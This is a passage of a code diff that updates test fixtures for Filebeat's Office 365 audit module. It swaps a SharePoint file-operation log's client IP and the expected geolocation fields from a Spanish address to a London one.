+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Version": 1, "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "RecordType": 6, "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:08", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents/Forms", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "aspx", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "All.aspx", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "ff3631c1-6189-45c7-ad45-c15cea9e9255", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileAccessed", "Id": "25b08f04-48ee-4755-ce22-08d7abecf3a9"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:08", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents/Forms", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "aspx", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "All.aspx", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "ff3631c1-6189-45c7-ad45-c15cea9e9255", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileAccessed", "Id": "25b08f04-48ee-4755-ce22-08d7abecf3a9"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:21", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "ImplicitShare": "No", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileUploaded", "Id": "dac93a9f-f2fb-4cac-d18f-08d7abecfbb6"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:21", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "ImplicitShare": "No", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileUploaded", "Id": "dac93a9f-f2fb-4cac-d18f-08d7abecfbb6"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Version": 1, "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
diff --git a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json
index 41256959a5c5..df66d37082c2 100644
--- a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json
@@ -1,8 +1,8 @@
 [
     {
         "@timestamp": "2020-02-07T16:44:07.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileDeleted",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -22,7 +22,7 @@
         "input.type": "log",
         "log.offset": 0,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b",
         "o365.audit.CreationTime": "2020-02-07T16:44:07",
         "o365.audit.EventSource": "SharePoint",
@@ -47,20 +47,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -83,8 +81,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:07.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileDeleted",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -102,9 +100,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 1130,
+        "log.offset": 1128,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b",
         "o365.audit.CreationTime": "2020-02-07T16:44:07",
         "o365.audit.EventSource": "SharePoint",
@@ -129,20 +127,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -165,8 +161,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:08.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileAccessed",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -184,9 +180,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 2260,
+        "log.offset": 2256,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1",
         "o365.audit.CreationTime": "2020-02-07T16:44:08",
         "o365.audit.EventSource": "SharePoint",
@@ -211,20 +207,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -247,8 +241,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:08.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileAccessed",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -266,9 +260,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 3346,
+        "log.offset": 3340,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1",
         "o365.audit.CreationTime": "2020-02-07T16:44:08",
         "o365.audit.EventSource": "SharePoint",
@@ -293,20 +287,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -329,8 +321,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:21.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileUploaded",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -348,9 +340,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 4432,
+        "log.offset": 4424,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011",
         "o365.audit.CreationTime": "2020-02-07T16:44:21",
         "o365.audit.EventSource": "SharePoint",
@@ -376,20 +368,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -412,8 +402,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:23.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileModified",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -431,9 +421,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 5540,
+        "log.offset": 5530,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "692b339f-902e-a000-f25f-95def5f17903",
         "o365.audit.CreationTime": "2020-02-07T16:44:23",
         "o365.audit.EventSource": "SharePoint",
@@ -458,20 +448,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -494,8 +482,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:07.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileDeleted",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -513,9 +501,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 6625,
+        "log.offset": 6613,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b",
         "o365.audit.CreationTime": "2020-02-07T16:44:07",
         "o365.audit.EventSource": "SharePoint",
@@ -540,20 +528,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -576,8 +562,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:21.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileUploaded",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -595,9 +581,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 7755,
+        "log.offset": 7741,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011",
         "o365.audit.CreationTime": "2020-02-07T16:44:21",
         "o365.audit.EventSource": "SharePoint",
@@ -623,20 +609,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
